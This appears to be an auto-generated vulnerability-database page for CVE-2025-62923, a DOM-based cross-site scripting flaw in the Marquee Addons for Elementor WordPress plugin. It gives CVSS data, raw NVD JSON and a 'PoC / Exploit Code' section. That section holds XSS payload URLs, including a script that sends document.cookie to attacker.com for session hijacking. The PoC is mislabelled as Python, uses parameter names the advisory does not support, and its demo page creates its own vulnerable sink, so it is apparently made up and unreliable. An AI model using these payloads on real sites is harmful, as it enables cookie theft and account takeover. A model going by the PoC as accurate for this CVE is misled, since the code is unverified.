Security Vulnerability Report
中文
CVE-2025-62923 CVSS 6.5 MEDIUM

CVE-2025-62923

Published: 2025-10-27 02:15:52
Last Modified: 2026-04-27 17:16:34

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Debuggers Studio Marquee Addons for Elementor marquee-addons-for-elementor allows DOM-Based XSS.This issue affects Marquee Addons for Elementor: from n/a through <= 3.8.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Marquee Addons for Elementor <= 3.8.2 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62923 DOM-Based XSS PoC for Marquee Addons for Elementor // Target: WordPress site with Marquee Addons for Elementor plugin <= 3.8.2 // Malicious URL payload that triggers XSS const maliciousURL = 'https://vulnerable-site.com/page-with-marquee/?marquee_text=<img src=x onerror=alert(document.cookie)>'; // Alternative payload using SVG element const svgPayload = 'https://vulnerable-site.com/page-with-marquee/?marquee_content=<svg onload=alert("XSS")>'; // Payload that steals session information const sessionHijackPayload = `https://vulnerable-site.com/page-with-marquee/?marquee_id="><script>fetch('https://attacker.com/steal?c='+document.cookie)</script>`; // JavaScript code to detect vulnerability function testXSS() { const testPayload = '<img src=x onerror=console.log("XSS-VULN")>'; const url = new URL(window.location.href); url.searchParams.set('marquee_text', testPayload); console.log('Testing XSS with URL:', url.toString()); } // PoC HTML page const pocHTML = ` <!DOCTYPE html> <html> <head><title>CVE-2025-62923 PoC</title></head> <body> <h1>Marquee Addons XSS Vulnerability PoC</h1> <p>Click the link below to test:</p> <a href="${maliciousURL}" target="_blank">Trigger XSS</a> <script> // Check if vulnerable parameter exists const params = new URLSearchParams(window.location.search); if (params.has('marquee_text')) { document.write('<div class="marquee-content">' + params.get('marquee_text') + '</div>'); } </script> </body> </html> `;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62923", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:51.970", "lastModified": "2026-04-27T17:16:34.420", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Debuggers Studio Marquee Addons for Elementor marquee-addons-for-elementor allows DOM-Based XSS.This issue affects Marquee Addons for Elementor: from n/a through <= 3.8.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/marquee-addons-for-elementor/vulnerability/wordpress-marquee-addons-for-elementor-plugin-3-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}